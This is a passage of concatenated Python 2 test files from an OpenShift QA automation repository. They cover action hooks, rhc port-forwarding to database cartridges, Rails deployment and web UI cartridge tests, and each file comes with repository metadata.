self.test_variant)\n self.custom_cart_commands= \"#!/bin/sh\\n\\nid; echo TESTING_STRING_%s; \"%(\n self.cart_variant)\n self.hook_app_file = \"%s/.openshift/action_hooks/post_start_%s\"%(\n self.app_name, common.app_types[self.test_variant])\n self.hook_cart_file = \"%s/.openshift/action_hooks/post_start_%s\"%(\n self.app_name, common.cartridge_types[self.cart_variant])\n\n common.env_setup()\n\n\n def finalize(self):\n #just for the case if something interrupts restarting...\n common.run_remote_cmd_as_root(\"/sbin/service libra start\")\n\n\nclass PostStartScript(OpenShiftTest):\n def test_method(self):\n\n self.add_step(\"Create an app\", \n common.create_app,\n function_parameters=[self.app_name,\n common.app_types[self.test_variant],\n self.user_email, \n self.user_passwd, \n True],\n expect_return = 0)\n self.add_step(\"Embed a cartridge\", \n common.embed,\n function_parameters=[self.app_name,\n \"add-%s\"%common.cartridge_types[self.cart_variant], \n self.user_email, \n self.user_passwd],\n expect_return = 0)\n\n self.add_step(\"Add post-start script for %s\"%self.test_variant,\n \"echo '%s' > %s\"%\n (self.custom_app_commands, self.hook_app_file),\n expect_return = 0)\n\n self.add_step(\"Chmod +x for our scripts\",\n \"chmod +x %s/.openshift/action_hooks/post_start_*\"%\n (self.app_name),\n expect_return = 0)\n\n #for app only\n self.add_step(\"Git add/commit/push [App+Cartridge]\",\n \"cd %s && git add . 
&& git commit -m new_files -a && git push\"%\n (self.app_name),\n expect_description = \"Only app hook should be executed\",\n expect_str = [\"remote: uid=\", \n \"remote: TESTING_STRING_%s\"%self.test_variant, \n \"remote: Done\"],\n unexpect_str = [\n \"remote: uid=0\"], #must not be root\n expect_return = 0)\n\n #add cartridge hook\n self.add_step(\"Add post-start script for %s\"%self.cart_variant,\n \"echo '%s'> %s\"%\n (self.custom_cart_commands, self.hook_cart_file),\n expect_return = 0)\n\n self.add_step(\"Chmod +x for our scripts\",\n \"chmod +x %s/.openshift/action_hooks/post_start_*\"%\n (self.app_name),\n expect_return = 0)\n\n #for both of them...\n self.add_step(\"Git add/commit/push [BOTH]\",\n \"cd %s && git add . && git commit -m update_hooks -a && git push\"%\n (self.app_name),\n expect_description = \"Both hooks should be executed\",\n expect_str = [\"remote: uid=\", \n \"remote: TESTING_STRING_%s\"%self.test_variant, \n \"remote: TESTING_STRING_%s\"%self.cart_variant, \n \"remote: Done\"],\n unexpect_str = [\n \"remote: uid=0\"], #must not be root\n expect_return = 0)\n\n self.add_step(\"Check the app url\",\n common.check_web_page_output,\n function_parameters=[self.app_name],\n try_count=3,\n expect_return = 0)\n\n #only for CART, no PHP\n self.add_step(\"Remove PHP post-start script\",\n \"cd %s && git rm -f %s \"%(self.app_name, self.hook_app_file.replace(self.app_name,\".\")),\n expect_return = 0)\n\n self.add_step(\"Git add/commit/push\",\n \"cd %s && git add . && git commit -m update_hooks -a && git push\"%\n (self.app_name),\n expect_description = \"Only cartridge hook should be executed\",\n expect_str = [\"remote: uid=\", \n \"remote: TESTING_STRING_%s\"%self.cart_variant, \n \"remote: Done\"],\n unexpect_str = [\n \"remote: uid=0\", #must not be root\n \"remote: TESTING_STRING_%s\"%self.test_variant], \n expect_return = 0)\n\n self.add_step(\"Check the app url\",\n common.check_web_page_output,\n function_parameters=[self.app_name],\n try_count=3,\n expect_return = 0)\n #\n #check the timeout\n #\n self.custom_app_commands += \"sleep %s\"%(self.timeout)\n self.custom_cart_commands += \"sleep %s\"%(self.timeout)\n self.add_step(\"Add post-start script for %s\"%self.test_variant,\n \"echo '%s' > %s\"%\n (self.custom_app_commands, self.hook_app_file),\n expect_return = 0)\n\n self.add_step(\"Add post-start script for %s\"%self.cart_variant,\n \"echo '%s'> %s\"%\n (self.custom_cart_commands, self.hook_cart_file),\n expect_return = 0)\n\n self.add_step(\"Chmod +x for our scripts\",\n \"chmod +x %s/.openshift/action_hooks/post_start_*\"%\n (self.app_name),\n expect_return = 0)\n\n self.add_step(\"Git add/commit/push [TIMEOUT+BOTH]\",\n \"cd %s && git add . 
&& git commit -m update_hooks -a && git push\"%\n (self.app_name),\n expect_description = \"Both hooks should be executed\",\n expect_str = [\"remote: uid=\", \n \"remote: TESTING_STRING_%s\"%self.test_variant, \n \"remote: TESTING_STRING_%s\"%self.cart_variant, \n \"remote: Done\"],\n unexpect_str = [\"remote: uid=0\"], #must not be root\n expect_return = 0)\n\n\n self.add_step(\"Check the output remotely\",\n common.run_remote_cmd_as_root,\n expect_description = \"`Timeout' warning message should be present in the output of libra start\",\n function_parameters = [\"/sbin/service libra restart | grep Timeout\"],\n expect_return = 0)\n\n self.add_step(\"Check the app url\",\n common.check_web_page_output,\n function_parameters=[self.app_name],\n expect_return = 0)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PostStartScript)\n return suite\n\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of PostStartScript.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6177945137023926, "alphanum_fraction": 0.6328321099281311, "avg_line_length": 16.733333587646484, "blob_id": "b7594813b02b7506d4151fb98a428174fe0f6c4e", "content_id": "04e5853f466da7a9ab1d66550f862ccbe5aa250a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 798, "license_type": "no_license", "max_line_length": 54, "num_lines": 45, "path": "/automation/open/testmodules/BI/Demo01.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\n\"\"\"\nimport rhtest\nimport database\nimport time\n\nimport random\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n ITEST = \"Titan\"\n\n def initialize(self):\n #tb = self.config.testbed\n pass\n\n def finalize(self):\n pass\n\n\nclass Demo01(OpenShiftTest):\n def test_method(self):\n errorCount = ((random.randint(1, 8) % 8) == 0)\n\n if errorCount:\n return self.failed(\"Demo01 test failed.\")\n else:\n return self.passed(\"Demo01 test passed.\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Demo01)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6037099361419678, "alphanum_fraction": 0.6286677718162537, "avg_line_length": 30.53191566467285, "blob_id": "e56a3f675b7b793b5134a3135ed05d496d70e1c2", "content_id": "6715a2db0808d054417b14dd963e0a6a7985a9fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2965, "license_type": "no_license", "max_line_length": 211, "num_lines": 94, "path": "/automation/open/testmodules/UI/web/case_180951.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_180951.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass AddAllCartridgeTospringeap(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n\n #create a jbosseap app\n #web.create_app(\"springeap6\",\"springeap\")\n web.go_to_create_app(\"springeap6\")\n web.input_by_id(\"application_name\", 
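            # fills in the name of the application being created; the submit click and the 40-second sleep that follow give the new springeap app time to finish provisioning.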
\"springeap\")\n web.click_element_by_id(\"application_submit\")\n time.sleep(40)\n web.assert_text_equal_by_xpath('''Your application has been created. If you're new to OpenShift check out these tips for where to go next.''', '''//div[@id='content']/div/div/div/div[2]/div/section/p''')\n\n \n #go to app springeap page and add cartridges\n web.add_cartridge(\"springeap\", \"mongodb-2.2\")\n time.sleep(8)\n web.assert_text_equal_by_xpath(\"rhc app cartridge remove -a springeap -c mongodb-2.2\",'''//pre[3]''') \n\n web.add_cartridge(\"springeap\", \"cron-1.4\")\n web.assert_text_equal_by_xpath(\"Cron 1.4\",'''//div[@id='cartridge_type_']/h3''')\n\n web.add_cartridge(\"springeap\", \"mysql-5.1\")\n web.assert_text_equal_by_xpath(\"rhc app cartridge remove -a springeap -c mysql-5.1\",'''//pre[3]''') \n\n web.add_cartridge(\"springeap\",\"metrics-0.1\")\n web.assert_text_equal_by_xpath(\"OpenShift Metrics 0.1\",'''//div[@id='cartridge_type_']/h3''')\n\n web.add_cartridge(\"springeap\",\"phpmyadmin-3.4\")\n web.assert_text_equal_by_xpath(\"phpMyAdmin 3.4\",'''//div[@id='cartridge_type_']/h3''')\n\n web.add_cartridge(\"springeap\",\"rockmongo-1.1\")\n web.assert_text_equal_by_xpath(\"rhc app cartridge remove -a springeap -c rockmongo-1.1\",'''//pre[3]''') \n\n web.go_to_app_detail(\"springeap\")\n web.click_element_by_xpath('''//a[contains(@href, '/building')]''')\n web.input_by_id(\"application_name\", \"jenkins\")\n web.click_element_by_id(\"application_submit\")\n time.sleep(150) \n web.assert_text_equal_by_xpath(\"Building your Application\",'''//div[@id='content']/div/div/div/div[2]/div/h1''')\n\n\n #delete a springeap app\n web.delete_app(\"springeap\")\n #delete a jenkins app\n web.delete_last_app(\"jenkins\")\n\n\n self.tearDown()\n\n return self.passed(\" case_180951--AddAllCartridgeTospringeap passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AddAllCartridgeTospringeap)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_180951.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5599119663238525, "alphanum_fraction": 0.5645245909690857, "avg_line_length": 48.68229293823242, "blob_id": "49fc5dc58d7048495272a418779fc212c75590d2", "content_id": "2383ebf6cf5838e3ff6bb0c2b864fe246721581d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9539, "license_type": "no_license", "max_line_length": 251, "num_lines": 192, "path": "/automation/open/testmodules/RT/client/rhc_port_forward.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport time\nimport re\nimport proc\nimport signal\nimport pexpect\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.app_name = common.getRandomString(10)\n try:\n self.app_type = self.get_variant()\n except:\n self.app_type = \"php\"\n #self.app_type = \"jbossas\"\n\n self.databases = {\n 'postgresql': {'check':'psql --version',\n 'cmd': 'echo \"*:PORT:DATABASE:USERNAME:PASSWORD\">$HOME/.pgpass;chmod 0600 $HOME/.pgpass;echo \"\\d\" | psql -w -h HOSTNAME --port PORT -U USERNAME DATABASE'},\n 'mongodb': {'check':'mongo --version',\n 'cmd': 'echo \"\" | mongo HOSTNAME:PORT/DATABASE 
-u USERNAME -p PASSWORD'},\n 'mysql': {'check':'mysql --version',\n 'cmd': 'echo \"SHOW TABLES;\" | mysql -h HOSTNAME -P PORT -u USERNAME -pPASSWORD DATABASE'}}\n\n self.info(\"Supported DB engines: %s\"%self.databases.keys())\n try:\n self.db_variant = self.config.tcms_arguments['db_cartridge']\n except:\n self.db_variant = 'mysql'\n self.info(\"Not defined 'db_cartridge' in TCMS arguments, using `%s` as default.\" % (self.db_variant))\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n if self.scalable:\n self.scalable = True\n\n if not self.databases.has_key(self.db_variant):\n raise rhtest.TestIncompleteError(\"Unsupported db cartridge. Use: %s\" % self.databases.keys())\n print \"-\"*80\n self.info(\"Variant: %s\"%self.app_type)\n self.info(\"DB Cartridge variant: %s\"%self.db_variant)\n self.info(\"SCALABLE : %s\"%self.scalable)\n print \"-\"*80\n cmd = self.databases[self.db_variant]['check'] #check for dependencies\n if (common.command_get_status(cmd) != 0):\n raise rhtest.TestIncompleteError(\"The '%s' client program is missing needed for accessing remote server. Install particular RPM in order to proceed with this testcase.\"%cmd)\n common.env_setup()\n\nclass RhcPortForward(OpenShiftTest):\n def test_port_forward(self, new_syntax=True):\n self.services = []\n result = True\n db_info = OSConf.get_embed_info(self.app_name, common.cartridge_types[self.db_variant])\n self.info(\"db_cartridge info: %s\"%db_info)\n if new_syntax:\n cmd = \"rhc port-forward %s -l %s -p '%s' %s\" % (self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS)\n else:\n cmd = \"rhc port-forward -a %s -l %s -p '%s' %s\" % (self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS)\n self.debug(\"Command: %s\" % (cmd))\n proc = pexpect.spawn(cmd)\n # expand the timeout from 20 to 40 to avoid slow response\n proc.expect('--', timeout=40)\n line = proc.readline()\n while 'terminate' not in line:\n line = proc.readline()\n self.info(line)\n #match = re.search(r'(\\w+)\\s+[\\d.:]+\\s+=>\\s+((\\d+\\.){3}\\d+):(\\d+)', line)\n #match = re.search(r'(\\w+)\\s+((\\d+\\.){3}\\d+):(\\d+)+\\s+=>\\s+[\\w\\.\\:\\-\\d]+', line)\n match = re.search(r'(\\w+)\\s+((\\d+\\.){3}\\d+):(\\d+)+\\s+=>[\\w\\s\\.\\:]*', line)\n self.info(line)\n print match\n if match:\n serv = match.group(1)\n host = match.group(2)\n port = match.group(4)\n print serv\n self.services.append(serv)\n ret = self.check_port(serv, host, port)\n if ret != 0:\n result = False\n self.debug(\"Check failed: %s %s:%s\" % (serv, host, port))\n #line = proc.readline()\n self.info(self.services)\n proc.terminate()\n return result\n\n def check_port(self, serv, host, port):\n self.info(\"Checking service %s at %s:%s\" % (serv, host, port))\n if serv in ('haproxy'):\n return common.grep_web_page(\"%s:%s\" % (host, port), \"(openshift)|(Statistics Report)\")\n elif serv in ['mysqld', 'mysql']:\n db_info = OSConf.get_embed_info(self.app_name, common.cartridge_types['mysql'])\n cmd = \"echo 'show databases;' | mysql -h %s -P %s -u %s -p%s %s\" % (host, port, db_info['username'], db_info['password'], self.app_name)\n elif serv in ['postgres', 'postgresql']:\n db_info = OSConf.get_embed_info(self.app_name, common.cartridge_types['postgresql'])\n cmd = 'echo \"%s:%s:%s:%s:%s\" > $HOME/.pgpass ; chmod 0600 $HOME/.pgpass ; echo \"\\d\" | psql -w -h %s --port %s -U %s %s' % (host, port, self.app_name, 
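            # the first five values build the host:port:database:user:password line for ~/.pgpass; the remaining four fill psql's -h/--port/-U flags and the database name.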
db_info['username'], db_info['password'], host, port, db_info['username'], self.app_name)\n elif serv in ['mongod', 'mongodb']:\n db_info = OSConf.get_embed_info(self.app_name, common.cartridge_types['mongodb'])\n cmd = 'echo \"show collections;\" | mongo -u %s -p %s %s:%s/%s' % (db_info['username'], db_info['password'], host, port, self.app_name)\n elif port == '8080':\n return common.grep_web_page(\"%s:%s\" % (host, port), \"(openshift)|(Statistics Report)\")\n else:\n self.info(\"No check for service: %s %s:%s\" % (serv, host, port))\n return 0\n return common.command_get_status(cmd)\n\n def test_method(self):\n self.info(\"[US1491][rhc-client] Run 'rhc port-forward' with various arguments\")\n self.debug(\"1. Create an app\")\n status = common.create_app(self.app_name,\n common.app_types[self.app_type],\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n False, \"./\", self.scalable)\n self.assert_equal(status, 0, \"%s application should be created.\"%self.app_type)\n\n if self.scalable:\n self.info(\"Embed all the database cartridges to the scalable app\")\n ret = common.embed(self.app_name,\n 'add-%s'%common.cartridge_types['mysql'],\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Embeding of mysql should pass.\")\n\n ret = common.embed(self.app_name,\n 'add-%s'%common.cartridge_types['postgresql'],\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Embeding of postgresql should pass.\")\n\n #ret = common.embed(self.app_name,\n # 'add-%s'%common.cartridge_types['mongodb'],\n # self.config.OPENSHIFT_user_email,\n # self.config.OPENSHIFT_user_passwd)\n #self.assert_equal(ret, 0, \"Embeding of mongodb should pass.\")\n\n ret = common.scale_up(self.app_name)\n self.assert_equal(ret, 0, \"The app should be scaled up\")\n else:\n self.info(\"Embed %s to the app\" % (self.db_variant))\n ret = common.embed(self.app_name,\n 'add-%s'%common.cartridge_types[self.db_variant],\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Embeding of %s should pass.\"%self.db_variant)\n\n ret = self.test_port_forward(True)\n self.assert_equal(ret, True, \"Failed to forward ports(new rhc syntax)\")\n ret = self.test_port_forward(False)\n self.assert_equal(ret, True, \"Failed to forward ports(old rhc syntax)\")\n if self.scalable:\n #self.assert_true(('mysql' in self.services), \"mysql ports of scalable apps should be forwarded\")\n #self.assert_true(('postgresql' in self.services), \"postgresql ports of scalable apps should be forwarded\")\n #self.assert_true(('mongodb' in self.services), \"mongo ports of scalable apps should be forwarded\")\n self.assert_true(('mysql' in self.services) or ('mysqld' in self.services), \"mysql ports of scalable apps should be forwarded\")\n self.assert_true(('postgresql' in self.services) or ('postgres' in self.services), \"postgresql ports of scalable apps should be forwarded\")\n #self.assert_true(('mongodb' in self.services) or ('mongod' in self.services), \"mongo ports of scalable apps should be forwarded\")\n\n else:\n if self.db_variant == 'mysql':\n db_service = 'mysqld'\n elif self.db_variant == 'postgresql':\n db_service = 'postgres'\n elif self.db_variant == 'mongodb':\n db_service = 'mongod'\n else:\n self.info(\"Invalid database\")\n self.assert_true((db_service in self.services) or (self.db_variant in self.services), \"%s ports haven't been forwarded\" % (self.db_variant))\n\n return 
self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcPortForward)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5896048545837402, "alphanum_fraction": 0.6019019484519958, "avg_line_length": 37.84713363647461, "blob_id": "67509868cb0bbec79b11e446b670f1ec6ceea3df", "content_id": "281b751ae93d9a0945f05b96f742b73345773c2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6099, "license_type": "no_license", "max_line_length": 186, "num_lines": 157, "path": "/automation/open/testmodules/RT/cartridge/ruby_rails_framework_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\n2012-08-15\n\n[rhc-cartridge]Ruby / Rails Framework Support ruby-1.8\n[US2123]ruby-1.9 / Rails3.2 Framework Support\nhttps://tcms.engineering.redhat.com/case/167902/\n\"\"\"\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport time\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False # define to True if your test is interactive (takes user input).\n ITEST = ['DEV', 'INT', 'STG'] #this will be checked by framework\n WORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"WARN: Missing variant, used `ruby` as default\")\n self.test_variant = 'ruby'\n try:\n self.rails_ver = self.config.tcms_arguments['rails']\n except:\n self.rails_ver = \"3.0.16\"\n self.summary = \"[rhc-cartridge]Ruby / Rails Framework Support ruby-1.8\\n[US2123]ruby-1.9 / Rails3.2 Framework Support\"\n if \"1.9\" in self.test_variant:\n self.app_name = \"ruby19rails\" + common.getRandomString(4)\n else:\n self.app_name = \"ruby18rails\" + common.getRandomString(4)\n self.app_type = common.app_types[self.test_variant]\n self.git_repo = \"./%s\" % (self.app_name)\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass RubyRailsFrameworkTest(OpenShiftTest):\n\n def setup(self):\n cmd = \"rails -v\"\n (ret, output) = common.command_getstatusoutput(cmd, True)\n if ret == 0 and \"Rails %s\" % (self.rails_ver) in output:\n return 0\n else:\n cmd = \"sudo gem uninstall railties actionpack actionmailer activemodel activeresource activerecord activesupport rails -axI ; sudo gem install -v %s rails\" % (self.rails_ver)\n (ret, output) = common.command_getstatusoutput(cmd, False)\n return ret\n\n def test_method(self):\n self.step(\"Setup rails environment\")\n ret = self.setup()\n self.assert_equal(ret, 0, \"Failed to setup rails %s environment\" % (self.rails_ver))\n\n time.sleep(5)\n\n self.step(\"Create %s app: %s\" % (self.app_type, self.app_name))\n ret = common.create_app(self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True, \"./\", self.scalable)\n self.assert_equal(ret, 0, \"Failed to create %s app: %s\" % (self.app_type, self.app_name))\n\n self.step(\"Create new rails application\")\n ret = common.command_get_status(\"rails new %s -f\" % (self.git_repo))\n self.assert_equal(ret, 0, \"Failed to create rails app\")\n\n if \"3.2\" in self.rails_ver:\n self.step(\"Add execjs and therubyracer for rails-3.2 application\")\n try:\n f = file(\"%s/Gemfile\" % 
(self.git_repo), \"a\")\n f.writelines([\"gem 'execjs'\\n\", \"gem 'therubyracer'\\n\"])\n f.close()\n except IOError, e:\n raise TestFailError, e\n except:\n raise TestFailError, \"Unkown exception. Failed to modify Gemfile\"\n\n self.step(\"Generate rails controller\")\n ret = common.command_get_status(\"cd %s && bundle install && rails generate controller home index\" % (self.git_repo, ))\n self.assert_equal(ret, 0, \"Failed to generate rails controller\")\n\n self.step(\"Create home page\")\n test_html = common.getRandomString()\n try:\n f = file(\"%s/app/views/home/index.html.erb\" % (self.git_repo), \"w\")\n f.write(test_html)\n f.close()\n except IOError, e:\n raise TestFailError, e\n except:\n raise TestFailError, \"Unkown exception. Failed to modify app/views/home/index.html.erb\"\n\n self.step(\"Remove public/index.html\")\n try:\n os.remove(\"%s/public/index.html\" % (self.git_repo))\n except OSError, e:\n raise TestFailError, e\n\n self.step(\"Add controller to config/routes.rb\")\n cmd = \"\"\"sed -i -e '3 i\\\\\\n root :to => \"home#index\"' %s/config/routes.rb\"\"\" % (self.git_repo)\n ret = common.command_get_status(cmd)\n self.assert_equal(ret, 0, \"Failed to modify config/routes.rb\")\n\n if \"3.2\" in self.rails_ver:\n cmd = \"sed -i -E 's/config.assets.compile = false/config.assets.compile = true/g' %s/config/environments/production.rb\" % (self.git_repo)\n ret = common.command_get_status(cmd)\n self.assert_equal(ret, 0, \"Failed to modify config/environments/production.rb\")\n\n self.step(\"Check hardware platform\")\n (ret, output) = common.command_getstatusoutput(\"uname -i\")\n self.assert_equal(ret, 0, \"Failed to get hardware platform\")\n self.hardware_platform = output.strip()\n\n if self.hardware_platform in (\"i386\", \"i686\"):\n self.step(\"Add sqlite3 libraries to .gitignore\")\n try:\n f = file(\"%s/.gitignore\" % (self.git_repo), \"a\")\n f.write(\"vendor/bundle/ruby/1.8/gems/sqlite3-*\\n\")\n f.close()\n except IOError:\n raise TestFailError, e\n except:\n raise TestFailError, \"Unkown exception. Failed to modify .gitignore\"\n\n self.step(\"Git push all the changes\")\n ret = common.command_get_status(\"cd %s && git add . 
&& git commit -amt && git push\" % (self.git_repo))\n self.assert_equal(ret, 0, \"Git push failed\")\n\n self.step(\"Check web page via brower\")\n self.app_url = OSConf.get_app_url(self.app_name)\n ret = common.grep_web_page(self.app_url, test_html)\n self.assert_equal(ret, 0, \"Rails app isn't deployed successfully\")\n\n return self.passed()\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RubyRailsFrameworkTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 24.5, "blob_id": "35de192307e7901fd8b1b139e3d6366b513d0e3c", "content_id": "8ddcfc66a8e5e6320fcb849a9f26b76734fdf757", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 51, "license_type": "no_license", "max_line_length": 34, "num_lines": 2, "path": "/automation/parallel/atest/funnylib.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "def this_keyword_is_in_funnylib():\n print 'jee'\n" }, { "alpha_fraction": 0.5110043883323669, "alphanum_fraction": 0.523809552192688, "avg_line_length": 29.845678329467773, "blob_id": "89619d119ea51909ade8894a3796aa6500df2f38", "content_id": "c4379118ca7fe75c0d04c303e6eb889aff1619ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4998, "license_type": "no_license", "max_line_length": 105, "num_lines": 162, "path": "/automation/open/testmodules/RT/Demo02.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n#\n# File name: Demo02.py\n# Date: 2012/05/11 14:50\n# Author: [email protected]\n#\n\nimport sys\nimport subprocess\nimport os\nimport string\nimport re\n\nimport common, OSConf\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.app_name = 'CtrApp1'\n self.app_type = 'php'\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%self.app_name) \n\nclass Demode02(OpenShiftTest):\n\n def create_app(self, *args, **kwargs): \n if kwargs.has_key(\"some_argument\"):\n print \"Possible argument received: \", kwargs['some_argument']\n if kwargs.has_key(\"app_name\"):\n print \"Another argument received: \", kwargs['app_name']\n self.app_name=kwargs['app_name']\n\n return common.create_app(self.app_name, \n common.app_types[self.app_type], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, True)\n\n def embed_app(self, *args, **kwargs):\n if len(args)>0:\n cartridge=args[0]\n else:\n cartridge = 'mysql'\n\n return common.embed(self.app_name, \n \"add-%s\"%common.cartridge_types[cartridge], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n\n def add_file(self, *args, **kwargs):\n if len(args)>0:\n filename=args[0]\n else:\n filename= \"testing.php\"\n f = open(\"%s/%s\"%(self.app_name, filename), \"wb\")\n f.write(\"\"\"\n<?php\nphpinfo();\n\n?>\n\n\"\"\")\n def grep_app(self, *args, **kwargs):\n last_output = self.get_output_from_last_step()\n print \"DEBUG: previous output:\", last_output\n url=OSConf.get_app_url(self.app_name)\n if len(args)>0:\n find_str = args[0]\n else:\n find_str = 'OpenShift'\n return common.grep_web_page(url, find_str)\n \n\n def test_method(self):\n\n step1 = self.add_step(\"Create an app\",\n self.create_app,\n function_parameters = {\"some_argument\": 
\"i_dont_know\"}, # also as dict() ...\n expect_str = [ #case sensitive for re.match()\n \"Now your new domain name is being propagated worldwide\", \n \"creation returned success\"],\n expect_return=0)\n\n step2_embed = self.add_step(\"Embed it\",\n self.embed_app,\n expect_return=0,\n unexpect_istr = \"This shouln't be there\", #case insesitive for re.match()\n expect_description=\"Embed should work...\")\n\n step3 = self.add_step(\"Add file\",\n self.add_file,\n function_parameters=[\"filename.php\"]) #default args for self.add_file\n\n step4 =self.add_step(\"Check the app via web\", \n self.grep_app,\n expect_return=0,\n try_count=3,\n try_interval=4)\n\n step5 = self.add_step(\"Git commit new file\",\n \"cd %s && touch X && git add X && git commit -a -m 'xx' && git push\"%self.app_name,\n expect_description=\"The output of push should contain something...\",\n expect_str=[\"remote: \"],\n expect_return=0)\n\n step6 = self.add_step(\"Local command with arguments:\", \n \"nslookup %s\",\n function_parameters=\"www.redhat.com\", #can be even string \n expect_str = [\"192.168.122.1\"],\n try_count=2,\n expect_return=0)\n\n\n step1(some_argument=\"argument\")\n\n step2_embed() #use default parameters\n step2_embed(\"cron\") #this step doesn't require checking results, \n\n (ret, output) = step3(\"This_is_the_file_I_want.php\")\n if (ret == 0):\n self.info(\"Everything is ok, let's continue with step4\")\n obj = re.search(r\"remote:(.*)\", output)\n if (obj):\n step4(obj.group(1))\n else:\n return self.failed(\"Unable to parse important output.\")\n else:\n self.info(\"Despite this problem, let's do something else... git...\")\n step5()\n\n step6() #nslookup with default arguments\n for url in [\"www.google.com\", \"www.yahoo.com\"]:\n step6(url)\n\n return self.passed()\n\n # or you can run this if you are satisfied with only sequence\n #return self.run_steps()\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Demode02)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of Demo02.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5951020121574402, "alphanum_fraction": 0.5967347025871277, "avg_line_length": 30.81818199157715, "blob_id": "a0a1f0cf85eae2b7f301fa79635d95e7630ed726", "content_id": "ef8c1494703e102af7c5ac1e07dfffb81426ac60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2450, "license_type": "no_license", "max_line_length": 99, "num_lines": 77, "path": "/automation/open/testmodules/RT/quick_start/quick_start_liferay.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport rhtest\nfrom quick_start_test import QuickStartTest\n\nclass 